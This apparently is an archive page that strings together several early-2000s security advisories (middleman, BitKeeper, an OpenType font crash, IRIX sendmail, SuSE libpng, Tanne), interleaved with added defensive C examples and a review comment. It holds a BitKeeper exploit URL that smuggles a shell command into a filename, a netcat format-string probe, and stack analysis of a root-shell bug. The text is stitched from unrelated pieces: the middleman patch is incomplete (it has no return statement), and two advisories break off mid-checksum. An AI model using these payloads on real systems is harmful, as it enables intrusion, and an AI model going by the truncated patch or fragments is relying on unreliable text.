middleman-1.2 and prior off-by-one bug
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

QITEST1 SECURITY ADVISORY #006

middleman-1.2 and prior off-by-one bug

PROGRAM DESCRIPTION

Middleman is a powerful proxy server with many features designed to make browsing the Internet a more pleasant experience. It can do much more than just proxying though; it can be used as a layer between any web server and client to filter HTTP requests, or act as a portal between an internal network and the Internet. It has an intuitive Web interface that provides an easy way of accessing and changing the proxy's configuration, there's no need to dig through any complicated configuration files. (quoted from its README.html)

VULNERABILITY DESCRIPTION

The program is affected by an ebp corruption condition in the routine performing the DNS lookup of the hostname provided in the request, because its own implementation of strncpy goes off by one. The bug could be easily exploited by a remote attacker, leading to a root shell if the daemon runs as root (it's really nice that the sample rc init file provided calls the daemon without dropping privileges, which is one of its features). If exploitation is not successful, it will result in a denial of service, because the program will die anyway.

DETAILS

In src/misc.c:

    /* strncpy which always NULL terminates */
    char *s_strncpy(char *d, char *s, size_t len)
    {
        char *dest = d;

        for (; len && (*dest = *s); s++, dest++, len--);
        *dest = '\0';
        return d;
    }

No doubt. It always NULL terminates. But it is also off by one.

In src/networks.c near line 614 we find:

    /* perform a dns lookup, using cached response from a previous lookup if possible */
    HOSTENT *net_dns(char *host)
    {
        time_t t;
        char *string, hst[128], buf[24];
        HOSTENT *hostent;

Looking at this code we could think the memory layout on the stack for this function is the following:

    hst[128] | string[4] | t[4] | ebp | eip
               V

In src/networks.c near line 627 we find:

    s_strncpy(hst, host, 128);

We know that s_strncpy puts its final 0x00 off by one. This fact, apparently, should not be a real problem, because the 0x00 byte should be put on the lsb of string. Where is the bug? Due to compilation (maybe optimization), those variables get allocated in a different way (I dumped this from the program):

    ** net_dns(): &hst    0xbf7ff9f4
    ** net_dns(): &string 0xbf7ff9d4
    ** net_dns(): &t      0xbf7ff9d8

So the real memory layout is:

    string[4] | t[4] | hst[128] | ebp | eip
                                  V

So we have ebp corruption. Let's have a memory dump:

    ** net_dns(): 0xbf7ff9f4 -> 0xbfffc0d3 (0)
    ** net_dns(): 0xbf7ff9f8 -> 0xbfffc0d3 (1)
    ** net_dns(): 0xbf7ff9fc -> 0xbfffc0d3 (2)
    [...]
    ** net_dns(): 0xbf7ffa70 -> 0xbfffc0d3 (31)
    ** net_dns(): 0xbf7ffa74 -> 0xbf7ffa00 (32)
    ** net_dns(): 0xbf7ffa78 -> 0x804db07 (33)

At 0xbf7ffa78 we have 0x804db07: that's the eip. Indeed:

    (gdb) x 0x804db07
    0x804db07 : 0xc483c289

net_connect() effectively calls net_dns(). At 0xbf7ffa74 there is the corrupted ebp. At 0xbf7ffa00 + 4 the execution flow will search for an eip:

    ** net_dns(): 0xbf7ffa04 -> 0xbfffc0d3 (4)

We can control the data contained at that address, which can obviously be a pointer to our code. But there's no need to explain here how this kind of vulnerability can be exploited: it's quite trivial.

I think this kind of problem should be seriously considered, because they are difficult to detect and prevent. But they can be avoided by simply checking that the program never goes off by one, even if the buffer is not immediately before the ebp: indeed there could be a condition like the one I described.

CREDITS

h2so4 - support and connectivity

SOLUTION

Apply the following patch.

8< - -----------------------------------------------------------------

- --- middleman/src/misc.c	2002-10-19 19:07:24.0 +0200
+++ middleman-patched/src/misc.c	2003-01-10 11:29:08.0 +0100
@@ -27,17 +27,34 @@
 #include 
 #include "proto.h"
- -/*
- -strncpy which always NULL terminates
- -*/
- -char *s_strncpy(char *d, char *s, size_t len)
- -{
- -	char *dest = d;
- -
- -	for (; len && (*dest = *s); s++, dest++, len--);
- -	*dest = '\0';
+ /* Adapted version of OpenBSD strlcpy */
+char *
+s_strncpy(dst, src, siz)
+	char *dst;
+	char *src;
+	size_t siz;
+{
+	register char *d = dst;
+	register const char *s = src;
+	register size_t n = siz;
+
+	/* Copy as many bytes as will fit */
+	if (n != 0 && --n != 0) {
+		do {
+			if ((*d++ = *s++) == 0)
+				break;
+		} while (--n != 0);
+	}
+
+	/* Not enough room in dst, add NUL and traverse rest of src */
+	if (n == 0) {
+		if (siz != 0)
+			*d = '\0';		/* NUL-terminate dst */
+		while (*s++)
+			;
+	}
-
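Review bot: the visible part of the hunk ends before any return statement, while the new definition keeps the original's `char *` return type; OpenBSD's strlcpy ends by returning a `size_t` character count, so the adapted body needs an explicit `return dst;` to keep the contract the old `return d;` gave to callers that use the returned pointer. Worth stating in the comment above the function, too: with this change `s_strncpy(hst, host, 128)` keeps at most 127 characters of the hostname and silently truncates longer ones, which the caller near networks.c line 627 should be prepared for.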
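The off-by-one and the stack-layout discussion above, as an added example written for this page (it is neither middleman's code nor the advisory's patch): the original s_strncpy next to a bounded copy that reserves the last byte for the terminator, and a probe that shows which of the two writes to d[len]. The probe's 8-byte buffer with one guard byte behind it stands in for hst[128] with the saved ebp behind it; the buffer sizes and the hostname are constructed.

```c
#include <stdio.h>
#include <string.h>

typedef char *(*copy_fn)(char *, char *, size_t);

/* The routine from src/misc.c as quoted in the advisory. When the source does
 * not fit, the loop stops with len == 0 and dest == d + len, so the final
 * '\0' lands at d[len]: one byte past the caller's buffer. */
char *s_strncpy_buggy(char *d, char *s, size_t len)
{
    char *dest = d;

    for (; len && (*dest = *s); s++, dest++, len--)
        ;
    *dest = '\0';
    return d;
}

/* Corrected copy (written for this example, not middleman's own fix): copy at
 * most len - 1 bytes, then terminate inside the buffer. Longer input is
 * truncated silently, as strlcpy-style functions do. */
char *s_strncpy_fixed(char *d, char *s, size_t len)
{
    size_t i;

    if (len == 0)
        return d;
    for (i = 0; i + 1 < len && s[i] != '\0'; i++)
        d[i] = s[i];
    d[i] = '\0';
    return d;
}

/* Probe: an 8-byte destination followed by one guard byte, all inside a single
 * 9-byte array so the write stays within a valid object and can be observed.
 * The guard plays the role of the saved ebp that followed hst[128] in
 * net_dns(). Returns 1 if the copy routine touched the guard. */
int writes_past_len(copy_fn copy, const char *src)
{
    char area[9];

    memset(area, 'X', sizeof area);
    copy(area, (char *)src, 8);     /* caller believes the buffer is 8 bytes */
    return area[8] != 'X';
}

/* Copies src into a static 8-byte buffer with the fixed routine so the
 * truncation behaviour can be inspected. */
const char *truncate_to_eight(const char *src)
{
    static char out[8];

    return s_strncpy_fixed(out, (char *)src, sizeof out);
}

int main(void)
{
    const char *longname = "hostname.example";   /* constructed, longer than 8 bytes */

    printf("buggy routine writes d[len]: %d\n", writes_past_len(s_strncpy_buggy, longname));
    printf("fixed routine writes d[len]: %d\n", writes_past_len(s_strncpy_fixed, longname));
    printf("fixed result: \"%s\"\n", truncate_to_eight(longname));
    return 0;
}
```

The probe makes the advisory's point concrete: the write is only one byte and only happens on over-long input, which is why it survives casual testing, and whether that byte lands in a harmless neighbour or in the saved frame pointer is entirely up to how the compiler orders the locals.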
BitKeeper remote shell command execution/local vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis: BitKeeper remote shell command execution/local vulnerability
Product:  BitKeeper (http://www.bitkeeper.com)
Version:  3.0.x
Author:   Maurycy Prodeus <[EMAIL PROTECTED]>
Date:     11 November 2002

Issue:
------

BitKeeper is a source management software. It contains a shell argument parsing vulnerability that lets a remote attacker run arbitrary shell commands on a system where BitKeeper listens to HTTP requests.

Details:
--------

1. Remote command execution

BitKeeper may be executed in daemon mode; then it opens a port and listens to incoming requests. BitKeeper provides remote users with access to project resources through a web interface. It calls the external diff binary as a parameter to the shell's -c option, which is susceptible to shell metacharacter injection.

2. Locally exploitable race condition

The second vulnerability is in temporary file handling, also during calling external programs. Piece of strace output:

    20495 getpid() = 20495
    20495 lstat("/tmp/foo.c-1.1-20495", 0xbfffae9c) = -1 ENOENT (No such file or directory)
    20495 lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=16384, ...}) = 0
    20495 open("/tmp/foo.c-1.1-20495", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 8

There is a race condition vulnerability after BitKeeper stats the file and before the file is opened. Additionally, it is created with insecure privileges.

Impact:
-------

If BitKeeper is running in daemon mode and listens to incoming requests, a remote attacker can execute arbitrary commands on the system with its privileges. A local attacker can additionally get access to temporary files, which may lead to taking over control of the program.

Vendor Status:
--------------

November 12, 2002   Vendor has been contacted
November 12, 2002   First answer
November 27, 2002   Information about pre-release
December 10, 2002   Last email

While coordinating the date of publishing this advisory, they stopped responding to my emails.
Exploit:
--------

If BitKeeper is run as a stand-alone daemon, the link:

    http://somehost.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c

should create a file named "iwashere" in the project root directory.

--
Maurycy Prodeus
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+IBbnC+8U3Z5wpu4RAkM6AKDEeTh1akZ5TfdWkvw2xaHBkgXIRwCglXYQ
sjzfB4azJzMu7wJTScSllvg=
=O+nl
-----END PGP SIGNATURE-----
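The two defects in the advisory above, as an added example that is not BitKeeper's code and was not posted by the advisory's author: the "sh -c" invocation pattern beside a fork/exec form that never gives a shell the chance to re-parse the file name, an argument check for anything that still has to be handed to an external tool, and mkstemp() in place of the lstat-then-open sequence from the strace output. The command line, file names and temporary path template are constructed. The same unquoted-parameter problem is what the KDE advisory further down this page describes.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* The pattern the advisory describes: file names are pasted into a command
 * string that /bin/sh -c re-parses, so ';', '`', '$(...)' and friends in a
 * name become shell syntax. Kept only for contrast; nothing here calls it. */
int run_diff_via_shell(const char *old_path, const char *new_path)
{
    char cmd[1024];

    snprintf(cmd, sizeof cmd, "diff -u %s %s", old_path, new_path);
    return system(cmd);
}

/* Hardened form: fork and exec the program directly with an argv vector.
 * No shell is involved, so each name arrives at diff as one argument no
 * matter what characters it contains; "--" stops it being read as an option.
 * Returns diff's exit status, or -1 if it could not be run. */
int run_diff_exec(const char *old_path, const char *new_path)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp("diff", "diff", "-u", "--", old_path, new_path, (char *)NULL);
        _exit(127);                       /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Belt-and-braces check for names that will reach any external tool: reject
 * empty names, option-looking names and shell metacharacters. */
int is_safe_argument(const char *name)
{
    static const char meta[] = ";&|`$<>(){}*?!'\"\\\n\r \t";

    if (name == NULL || *name == '\0' || *name == '-')
        return 0;
    return strpbrk(name, meta) == NULL;
}

/* Replacement for the lstat()-then-open(O_CREAT|O_TRUNC, 0666) sequence in
 * the strace output. mkstemp() creates the file atomically with O_EXCL and
 * mode 0600, so a local user can neither pre-create the name nor read the
 * result. Returns the permission bits of the created file (expected 0600)
 * and removes it again; -1 on failure. The template is a constructed path. */
int private_tempfile_mode(void)
{
    char path[] = "/tmp/diff-example-XXXXXX";
    struct stat st;
    int fd = mkstemp(path);

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);
    unlink(path);
    return (int)(st.st_mode & 0777);
}

int main(void)
{
    printf("\"foo.c\" safe as argument: %d\n", is_safe_argument("foo.c"));
    printf("\"foo.c;b\" safe as argument: %d\n", is_safe_argument("foo.c;b"));
    printf("temp file created with mode %04o\n", private_tempfile_mode());
    return 0;
}
```

The exec form is the real fix; the metacharacter filter is a second line of defence for code paths that cannot be converted, and it deliberately rejects rather than escapes, because escaping rules differ between shells.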
Re: Opentype font file causes Windows to restart.
[Since my first attempt yesterday was not approved by the BugTraq moderator, I'm trying it again, this time in a slightly different format and CC'ing vulnwatch, too.]

The problem is due to "incorrect" data in the "CFF" table of this font - for details, please see the attached message I sent to the OpenType mailing list (http://www.topica.com/lists/opentype - note that I have omitted the attachment to this message, which was Andrew's original BugTraq posting).

This specific flavor of an OpenType font (CFF outlines, i.e. "PostScript" data) is only supported natively by Windows 2000 and later. For previous Windows versions, you need ATM (Adobe Type Manager) to display such a font. Please note that the crash only occurs when trying to render the "o" character (that's what fontview.exe tries to do, of course).

As far as the creation of an embedded font for IE (.eot, embedded OpenType) is concerned, I'm not sure if it's possible to trigger the bug this way. When installing the "restarter" font and listing the fonts available for embedding in WEFT, Microsoft's Web Embedding Fonts Tool (the only publicly available tool I know of to create such fonts), OpenType fonts with CFF outline data do not appear in the list of available fonts. I suppose WEFT is currently limited to embedding OpenType fonts with TrueType outlines ("glyf" table) or plain PostScript Type 1 fonts (.pfb file suffix). The .eot format is not documented, as far as I know, so creating such a font manually would probably require quite some experimenting, and even then the question remains if IE would actually be able to deal with this font format and display the characters.

Kaspar

--- Begin Message ---

This was recently posted to BugTraq (a mailing list about computer security vulnerabilities, for those who don't know). Further inspection of the font file shows that the problem is in the CFF table - or more exactly, within the "o" character.
Disassembling the font with Just's excellent TTX (http://fonttools.sourceforge.net) produces the following result for the "o" character:

    10 290 rmoveto
    6 -1 7 1 2 -1 -1 -1 -1 -4 1 -4 1 -3 1 -5 1 -3 1 -5 1 -3 1 -4 1 -1 1 1 1 4 1 2 1 5 1 2 1 4 1 5 -1 5 -1 2 -1 2 -1 1 14 -1 -1 -7 1 -5 1 -4 1 -5 1 -3 1 -4 1 -4 2 2 1 4 1 4 1 3 1 5 1 4 1 4 1 6 -1 1 10 -1 -1 -2 -1 -1 -1 -5 -1 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -1 -8 2 -1 3 -1 5 -1 3 -1 4 -1 3 -1 4 -2 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3 -1 -1 -8 1 -1 4 -1 3 -1 4 -1 3 -1 4 -1 3 -1 3 -1 4 -1 3 -1 4 -1 3 -1 4 -1 2 -1 1 -1 1 hlineto
    69 hmoveto
    8 -1 28 -9 -1 2 -1 1 -3 1 -17 -1 -1 -13 14 2 1 1 1 -12 -2 2 -1 1 -13 -16 20 1 1 1 1 1 1 2 1 2 1 -8 -1 -4 -37 1 1 1 1 43 -2 2 hlineto
    223 hmoveto
    16 -1 4 -1 2 -10 1 -3 -2 3 -1 1 -1 1 -1 1 -1 1 -2 1 -2 1 -11 -1 -2 -1 -2 -1 -1 -1 -1 -1 -1 -1 -1 -2 -1 -2 -1 -7 -1 -2 1 -6 1 -3 1 -1 1 -2 1 -1 1 -1 1 -1 1 -1 2 -1 3 -1 4 1 3 1 1 1 1 1 1 3 1 6 -1 2 -2 1 -2 1 7 -1 1 1 2 -1 1 1 6 -1 -1 -1 -1 -2 -1 -17 -4 2 -1 2 -2 -1 -1 -1 -1 -1 -2 -1 -2 -1 -4 -1 -7 1 -4 1 -3 1 -2 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 2 -1 2 -1 3 -1 14 1 3 1 2 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 1 2 1 2 1 3 1 hlineto
    [... some more hmoveto/hlineto stuff deleted ...]
    endchar

Some simple experiments modifying this Charstring and reassembling the font with TTX showed that the crash is caused by the arguments to the hlineto operator. The Type 2 charstring specification (http://partners.adobe.com/asn/developer/pdfs/tn/5177.Type2.pdf) defines an implementation limit of 48 for the argument stack (Appendix B, p.33) - but in some cases, the number of arguments to the hlineto operator in this particular Charstring clearly exceeds this limit. In the end, this apparently leads to a page fault (i.e. a "blue screen") in ATMFD.DLL (the Type1/CFF font driver) - which shouldn't happen in any case, of course. I guess the folks at Adobe need to fix this.
BTW, checking the font with CFFChecker from the OpenType FDK gives a "Type 2 stack overflow" for this character (which is not really surprising, is it?).

Kaspar

--- End Message ---
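The check CFFChecker performs, as an added example written for this page (not the tool's code and not from either of the messages above): a scanner over a charstring in the text form TTX prints that tracks how many operands are pending when each operator is reached and compares the deepest count against the Type 2 limit of 48 from Appendix B. This is the validation a renderer or a font-ingest pipeline should apply before trusting a glyph. The sample charstrings are constructed; real TTX output also carries hintmask bit strings, which this simplified scanner does not special-case.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Implementation limit for the Type 2 argument stack (spec Appendix B). */
#define T2_MAX_STACK 48

/* Walks a charstring in the text form TTX prints ("10 290 rmoveto 6 -1 7 1
 * hlineto ... endchar"). Each numeric token pushes one operand; each operator
 * (an alphabetic token) consumes the whole stack. Returns the deepest operand
 * count seen, or -1 on a token that is neither. Limitation: the bit mask that
 * follows hintmask/cntrmask is printed as digits and would be counted here. */
int t2_max_operand_depth(const char *charstring)
{
    int depth = 0, max_depth = 0;
    const char *p = charstring;

    while (*p) {
        while (isspace((unsigned char)*p))
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && !isspace((unsigned char)*p))
            p++;
        size_t len = (size_t)(p - start);
        char tok[64];
        if (len >= sizeof tok)
            return -1;
        memcpy(tok, start, len);
        tok[len] = '\0';

        char *end;
        (void)strtod(tok, &end);                 /* the value itself is irrelevant */
        if (*end == '\0') {                      /* whole token numeric: push */
            if (++depth > max_depth)
                max_depth = depth;
        } else if (isalpha((unsigned char)tok[0])) {
            depth = 0;                           /* operator clears the stack */
        } else {
            return -1;                           /* malformed token */
        }
    }
    return max_depth;
}

/* 1 if every operator in the charstring is reached with at most T2_MAX_STACK
 * operands pending, 0 if the limit is exceeded or the input is malformed. */
int t2_within_stack_limit(const char *charstring)
{
    int d = t2_max_operand_depth(charstring);
    return d >= 0 && d <= T2_MAX_STACK;
}

/* Constructed sample: n operands of "1" before a single hlineto, the shape
 * of the offending "o" glyph. Returns the depth the scanner reports for it. */
int t2_sample_depth(int n)
{
    static char buf[8192];
    size_t used = 0;
    int i;

    for (i = 0; i < n && used + 2 < sizeof buf - 16; i++)
        used += (size_t)snprintf(buf + used, sizeof buf - used, "1 ");
    snprintf(buf + used, sizeof buf - used, "hlineto endchar");
    return t2_max_operand_depth(buf);
}

int main(void)
{
    const char *ok = "10 290 rmoveto 6 -1 7 1 hlineto endchar";   /* constructed */

    printf("depth %d, within limit: %d\n", t2_max_operand_depth(ok), t2_within_stack_limit(ok));
    printf("48 operands -> depth %d\n", t2_sample_depth(48));
    printf("49 operands -> depth %d (over the limit)\n", t2_sample_depth(49));
    return 0;
}
```

Rejecting the glyph at this point, before the charstring reaches the interpreter, is the cheap fix on the consuming side; it does not depend on the driver being patched.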
Multiple Vulnerabilities in Sendmail on IRIX
-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                          SGI Security Advisory

        Title:     Multiple Vulnerabilities in Sendmail
        Number:    20030101-01-P
        Date:      January 6, 2003
        Reference: CVE CAN-2002-1165
        Reference: iDEFENSE Security Advisory 10.01.02
        Reference: SGI BUG 869098 875386
        Fixed in:  IRIX 6.5.19 or patch 4911
______________________________________________________________________________

--- Issue Specifics ---

This bulletin addresses two vulnerabilities that exist in SGI supplied versions of sendmail:

  o sendmail's smrsh restrictions can be bypassed by a local user, possibly gaining root access. See the following URLs for additional information:
    http://www.idefense.com/advisory/10.01.02.txt
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1165

  o sendmail's "check_relay" for IP addresses can be circumvented using bogus DNS data. http://www.sendmail.org/ has more details in "Recent News (2002-Dec-03)".

SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected with a patch and in future releases of IRIX.

--- Impact ---

The sendmail binary is installed by default on IRIX 6.5 systems as part of eoe.sw.base.

To determine the version of IRIX you are running, execute the following command:

    # /bin/uname -R

That will return a result similar to the following:

    # 6.5 6.5.16f

The first number ("6.5") is the release name, the second ("6.5.16f" in this case) is the extended release name. The extended release name is the "version" we refer to throughout this document.

--- Temporary Workaround ---

There is no effective workaround available for these problems. SGI recommends either upgrading to IRIX 6.5.19 when released, or installing the appropriate patch from the listing below.

--- Solution ---

SGI has provided a series of patches for these vulnerabilities. Our recommendation is to upgrade to IRIX 6.5.19 when available, or install the appropriate patch.

    OS Version    Vulnerable?    Patch #    Other Actions
    ----------    -----------    -------    -------------
    IRIX 3.x      unknown                   Note 1
    IRIX 4.x      unknown                   Note 1
    IRIX 5.x      unknown                   Note 1
    IRIX 6.0.x    unknown                   Note 1
    IRIX 6.1      unknown                   Note 1
    IRIX 6.2      unknown                   Note 1
    IRIX 6.3      unknown                   Note 1
    IRIX 6.4      unknown                   Note 1
    IRIX 6.5      yes                       Notes 2 & 3
    IRIX 6.5.1    yes                       Notes 2 & 3
    IRIX 6.5.2    yes                       Notes 2 & 3
    IRIX 6.5.3    yes                       Notes 2 & 3
    IRIX 6.5.4    yes                       Notes 2 & 3
    IRIX 6.5.5    yes                       Notes 2 & 3
    IRIX 6.5.6    yes                       Notes 2 & 3
    IRIX 6.5.7    yes                       Notes 2 & 3
    IRIX 6.5.8    yes                       Notes 2 & 3
    IRIX 6.5.9    yes                       Notes 2 & 3
    IRIX 6.5.10   yes                       Notes 2 & 3
    IRIX 6.5.11   yes                       Notes 2 & 3
    IRIX 6.5.12   yes                       Notes 2 & 3
    IRIX 6.5.13   yes                       Notes 2 & 3
    IRIX 6.5.14   yes                       Notes 2 & 3
    IRIX 6.5.15   yes            4911       Notes 2, 4 & 5
    IRIX 6.5.16   yes            4911       Notes 2, 4 & 5
    IRIX 6.5.17   yes            4911       Notes 2, 4 & 5
    IRIX 6.5.18   yes            4911       Notes 2, 4 & 5
    IRIX 6.5.19   no

NOTES

  1) This version of the IRIX operating system has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information.
  2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/
  3) Upgrade to IRIX 6.5.15 or later and install the patch, or upgrade to IRIX 6.5.19 when released.
  4) Install patch 4911
  5) You should also use the workarounds noted in SGI Security Advisory 20011101-01-I

# Patch File Checksums

The actual patch will be a tar file containing the following files:

    Filename:                 README.patch.4911
    Algorithm #1 (sum -r):    61910 9 README.patch.4911
    Algorithm #2 (sum):       20270 9 README.patch.4911
    MD5 che
SuSE Security Announcement: libpng (SuSE-SA:2003:0004)
-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                        SuSE Security Announcement

        Package:                libpng
        Announcement-ID:        SuSE-SA:2003:0004
        Date:                   Tuesday, Jan 14th 2003 11:00 MEST
        Affected products:      7.1, 7.2, 7.3, 8.0, 8.1
                                SuSE Linux Database Server
                                SuSE eMail Server 3.1
                                SuSE eMail Server III
                                SuSE Firewall Adminhost VPN
                                SuSE Linux Admin-CD for Firewall
                                SuSE Firewall on CD 2 - VPN
                                SuSE Firewall on CD 2
                                SuSE Linux Enterprise Server for S/390
                                SuSE Linux Connectivity Server
                                SuSE Linux Enterprise Server 7
                                SuSE Linux Enterprise Server 8
                                SuSE Linux Office Server
                                UnitedLinux 1.0
        Vulnerability Type:     possible remote compromise
        Severity (1-10):        4
        SuSE default package:   yes
        Cross References:       CAN-2002-1363

    Content of this advisory:
        1) security vulnerability resolved: wrong offset calculation
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
            - fam
            - xpdf
            - libmcrypt
        3) standard appendix (further information)
______________________________________________________________________________

1) problem description, brief discussion, solution, upgrade information

    The library libpng provides several functions to encode, decode and manipulate Portable Network Graphics (PNG) image files. Due to wrong calculation of some loop offset values a buffer overflow can occur. The buffer overflow can lead to Denial-of-Service or even to remote compromise.

    After updating libpng all applications that use libpng should be restarted. Due to the fact that a lot of applications are linked with libpng it may be necessary to switch to runlevel S and back to the previous runlevel or even to reboot the system.

    There is no temporary fix known. Please install the new packages from our FTP servers.

    Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update.

    Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web.

    Intel i386 Platform:

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libpng-1.2.4-58.i586.rpm
      7d21806e31c16a9c4bf351b303ce81aa
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libpng-1.2.4-58.i586.patch.rpm
      3efc4170990f081117c8106efd7bed33
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/libpng-1.2.4-58.src.rpm
      a24985f7c0bb5a54c87115a7944a87cf

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/libpng-2.1.0.12-160.i386.rpm
      13d9eef080381224c1e4e0d168401a27
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/libpng-2.1.0.12-160.i386.patch.rpm
      fc75c7843967f914810520bc0d63503b
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/libpng-2.1.0.12-160.src.rpm
      0269d8c6fa56109120d5933fd914b82b

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/gra1/libpng-2.1.0.12-160.i386.rpm
      707082f5742ee15ed94de2df066963a2
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/libpng-2.1.0.12-160.src.rpm
      1206600c361fefc09efb83887203d00a

    SuSE-7.2:
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/gra1/libpng-2.1.0.10-57.i386.rpm
      9a6ee6c1a3344be521398aca8b613f03
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/libpng-2.1.0.10-57.src.rpm
      c5fe80f3683a1c62e9ae84c4e1541e5a

    SuSE-7.1:
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/gra1/libpng-2.1.0.8-17.i386.rpm
      d2e6e198fdbe2e3bb0a3ba2b8dc3e524
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/libpng-2.1.0.8-17.src.rpm
      024121c035b54982ea5b8394804cc796

    Sparc Platform:

    SuSE-7.3:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/gra1/libpng-2.1.0.12-99.sparc.rpm
      305317e07da2749b6d198d4899c4313c
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/libpng-2.1.0.12-99.src.rpm
      2d4302f4b6a4fb29d392aef053539fc4

    AXP Alpha Platform:

    SuSE-7.1:
    ftp://ftp.suse.com/pub/suse/axp/update/7.1/gra1/libpng-2.1.0.8-24.alpha.rpm
      970e51672298667
RE: Opentype font file causes Windows to restart.
Windows98 - No reboot.

-----Original Message-----
From: Andrew [mailto:[EMAIL PROTECTED]]
Sent: Monday, January 06, 2003 10:37 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Opentype font file causes Windows to restart.

Problem
-------

The attached OpenType font file will cause Windows to restart immediately when the file is opened by the default viewer (fontview). I doubt anyone would suspect a "harmless" little font file of being able to cause such a thing to happen!

Software affected
-----------------

It has been tested on both Windows 2000 and Windows XP with exactly the same result -- an immediate restart. Other versions of Windows are untested.

Fix
---

No fix known.

- Andrew Connell
[INetCop Security Advisory] Remote format string vulnerability in Tanne.
INetCop Security Advisory #2003-0x82-012

* Title: Remote format string vulnerability in Tanne.

0x01. Description

About:
tanne is a small, secure session-management solution for HTTP. It replaces common sessions with a system consisting of PIN and TANs, well known from online banking. Its main purpose is to enable programmers of Web applications to have real secure sessions without cookies or session-ids. More detailed information is at http://tanne.fluxnetz.de/.

The vulnerability can be presumed as follows. There is a logger() function at line 29 of the 'netzio.c' code:

__________________________________________________________________________
59     else
60     {
61         va_start( args, str );
62         vsnprintf( txt, 511, str, args );
63         va_end( args );
64         openlog( "Tanne2", LOG_PID, LOG_DAEMON );
65         syslog( LOG_INFO, txt ); // Here.
66         closelog();
67     }
68     umask( NORMALE_UMASK );
69 #else
70     va_start( args, str );
71     vsnprintf( txt, 511, str, args );
72     va_end( args );
73     openlog( "Tanne2", LOG_PID, LOG_DAEMON );
74     syslog( LOG_INFO, txt ); // Here.
75     closelog();
76 #endif
77 }
--------------------------------------------------------------------------

This is a very dangerous security vulnerability. It's already well known. ;-)

0x02. Vulnerable Packages

Vendor site: http://tanne.fluxnetz.de/

tanne 0.6.17
  - tanne-0.6.17.tar.bz2
  + Linux
  + Other

0x03. Exploit

When compiled and tested, it brings the following result.

    bash# netstat -an | grep 14002
    tcp        0      0 127.0.0.1:14002         0.0.0.0:*               LISTEN
    bash# nc 0 14002
    %x%x%x%x
    |F|
    bash# tail -1 /var/log/messages
    Jan  5 11:29:55 xpl017elz Tanne2[3540]: FATAL: ID (804bbc0118b980) nicht gefunden
    bash#

When our examination ends, we will exhibit exploit code as proof of concept. hehe !!

0x04. Patch

=== netzio.patch ===
--- netzio.c	Wed Jul 25 22:17:29 2001
+++ netzio.patch.c	Sun Jan  5 11:18:31 2003
@@ -62,7 +62,7 @@
 	vsnprintf( txt, 511, str, args );
 	va_end( args );
 	openlog( "Tanne2", LOG_PID, LOG_DAEMON );
-	syslog( LOG_INFO, txt );
+	syslog( LOG_INFO, "%s", txt );
 	closelog();
 }
 umask( NORMALE_UMASK );
@@ -71,7 +71,7 @@
 	vsnprintf( txt, 511, str, args );
 	va_end( args );
 	openlog( "Tanne2", LOG_PID, LOG_DAEMON );
-	syslog( LOG_INFO, txt );
+	syslog( LOG_INFO, "%s", txt );
 	closelog();
 #endif
 }
=== eof ===

P.S: Sorry for my poor English.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net
